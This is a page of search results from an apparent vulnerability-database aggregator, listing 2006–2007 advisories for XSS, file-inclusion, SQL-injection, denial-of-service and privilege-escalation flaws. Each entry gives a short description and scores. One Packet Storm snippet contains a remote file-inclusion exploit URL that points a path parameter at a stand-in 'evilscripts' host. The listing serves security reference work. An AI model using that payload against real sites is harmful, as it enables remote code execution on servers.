
6643 matches found

xssed
added 2007/02/07 12:0 a.m., 57 views

Unfixed XSS vulnerability at www.barhan.cn

Security researcher CoNqUeRoR has submitted on 02/07/2007 a cross-site-scripting (XSS) vulnerability affecting www.barhan.cn, which at the time of submission ranked 1992683 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 03/07/2007. It is...

Exploits: 0, References: 1
Cvelist
added 2007/02/06 2:0 a.m., 21 views

CVE-2007-0763

Cross-site scripting (XSS) vulnerability in the news comment functionality in F3Site 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the Autor field...

5.7 AI score, 0.04835 EPSS
Exploits: 1, References: 4
Prion
added 2007/01/31 11:28 a.m., 16 views

Design/Logic Flaw

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 does not check for duplicate entries when adding newly discovered available contacts, which allows remote attackers to cause a denial of service (disrupted communication) via a flood o...

5 CVSS, 6.5 AI score, 0.05668 EPSS
Exploits: 1, References: 4, Affected Software: 2
Cvelist
added 2007/01/31 11:0 a.m., 25 views

CVE-2007-0614

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote attackers to cause a denial of service (persistent application crash) via a crafted phsh hash attribute in a TXT key...

6 AI score, 0.10191 EPSS
Exploits: 1, References: 8
EUVD
added 2007/01/31 11:0 a.m., 1 views

EUVD-2007-0612

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote attackers to cause a denial of service (persistent application crash) via a crafted phsh hash attribute in a TXT key...

7.8 CVSS, 6 AI score, 0.10191 EPSS
Exploits: 1, References: 8
Gentoo Linux
added 2007/01/27 12:0 a.m., 21 views

X.Org X server: Multiple vulnerabilities

Background: The X Window System is a graphical windowing system based on a client/server model. Description: Multiple memory corruption vulnerabilities have been found in the ProcDbeGetVisualInfo and the ProcDbeSwapBuffers of the DBE extension, and ProcRenderAddGlyphs in the Render extension. Impac...

10 CVSS, 7.5 AI score, 0.06429 EPSS
Exploits: 0
Packet Storm
added 2007/01/27 12:0 a.m., 28 views

xero-rfi.txt

C XORON - 2007 Bug name: Xero Portal v1.2 phpbbrootpath Local File Include Vulnerability Script Name: Xero Portal v1.2 Wrong Codes: require$phpbbrootpath . 'includes/bbcode.'.$phpEx; Exploit: www.target.com/scriptpat/admin/adminlinkdb.php?phpbbrootpath=http://evilscripts?...

7.4 AI score
Exploits: 0
Prion
added 2007/01/26 1:28 a.m., 12 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in index.html (aka the administration page) in PHP Link Directory (phpLD) 3.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted link, which is triggered when the administrator uses the "Validate Links" functionality...

4.3 CVSS, 6.1 AI score, 0.00409 EPSS
Exploits: 1, References: 4, Affected Software: 1
CVE
added 2007/01/26 1:0 a.m., 37 views

CVE-2007-0529

CVE-2007-0529 affects PHP Link Directory (phpLD) 3.0.6 and earlier. The vulnerability is a Cross-Site Scripting (XSS) in the admin page index.html, exploitable via a crafted link and triggered when the administrator uses the "Validate Links" functionality. The CVSS 2.0 base score is 4.3 (Medium) ...

4.3 CVSS, 5.7 AI score, 0.00409 EPSS
Exploits: 1, References: 4, Affected Software: 1
security_vulns
added 2007/01/01 12:0 a.m., 6 views

Kerio Winroute Firewall 5.10 users credentials leak

Application: Kerio Winroute Firewall 5.10 Vendor: Kerio Technologies Inc. Vendor Site: http://www.kerio.com Remote: Yes Exploitable: Yes Risk level: Critical if proxy requires authentication Authors: Alexander Antipov & 3APA3A aka Pig Killer Authors Sites: http://www.securitylab.ru...

0.4 AI score
Exploits: 0
Exploit DB
added 2006/12/16 12:0 a.m., 30 views

eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion

source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts. By combining thi...

7.4 AI score
Exploits: 0
exploitpack
added 2006/12/16 12:0 a.m., 17 views

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion

eXtreme-fusion 4.02 - FusionForumView.php Local File Inclusion source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized...

7.4 AI score
Exploits: 0
Cvelist
added 2006/12/07 5:0 p.m., 11 views

CVE-2006-6369

SQL injection vulnerability in lib/entryreplyentry.php in Invision Community Blog Mod 1.2.4 allows remote attackers to execute arbitrary SQL commands via the eid parameter, when accessed through the "Preview message" functionality...

8.4 AI score, 0.00282 EPSS
Exploits: 0, References: 4
NVD
added 2006/12/01 12:28 a.m., 9 views

CVE-2006-6196

Cross-site scripting (XSS) vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field (txtsearchtext parameter)...

6.8 CVSS, 5.7 AI score, 0.02076 EPSS
Exploits: 1, References: 6
CVE
added 2006/12/01 12:0 a.m., 32 views

CVE-2006-6196

CVE-2006-6196 describes a cross-site scripting (XSS) vulnerability in the search functionality of the Fixit iDMS Pro Image Gallery. The issue allows remote attackers to inject arbitrary web script or HTML via the search field (txtsearchtext parameter). The NVD entry lists a CVSSv2 base score of 6...

6.8 CVSS, 5.9 AI score, 0.02076 EPSS
Exploits: 1, References: 6, Affected Software: 1
Cvelist
added 2006/12/01 12:0 a.m., 16 views

CVE-2006-6196

Cross-site scripting (XSS) vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field (txtsearchtext parameter)...

5.7 AI score, 0.02076 EPSS
Exploits: 1, References: 6
Gentoo Linux
added 2006/11/07 12:0 a.m., 17 views

NVIDIA binary graphics driver: Privilege escalation vulnerability

Background: The NVIDIA binary graphics driver from NVIDIA Corporation provides the kernel module and the GL modules for graphic acceleration on the NVIDIA based graphic cards. Description: Rapid7 reported a boundary error in the NVIDIA binary graphics driver that leads to a buffer overflow in the...

7.5 CVSS, 7.3 AI score, 0.36455 EPSS
Exploits: 1
CVE
added 2006/10/20 5:0 p.m., 37 views

CVE-2006-5430

CVE-2006-5430 is an XSS vulnerability affecting db-central (dbc) Enterprise CMS and db-central CMS, exploitable through the search needle parameter. The core issue is a reflected/script injection in the search functionality, enabling remote attackers to inject arbitrary script/HTML. The CVSS v2 v...

6.8 CVSS, 5.8 AI score, 0.0124 EPSS
Exploits: 0, References: 5, Affected Software: 2
NVD
added 2006/10/10 4:6 a.m., 7 views

CVE-2006-5168

Cross-site scripting (XSS) vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

4.3 CVSS, 5.7 AI score, 0.00427 EPSS
Exploits: 0, References: 5
Cvelist
added 2006/10/04 4:0 p.m., 13 views

CVE-2006-5168

Cross-site scripting (XSS) vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

5.7 AI score, 0.00427 EPSS
Exploits: 0, References: 5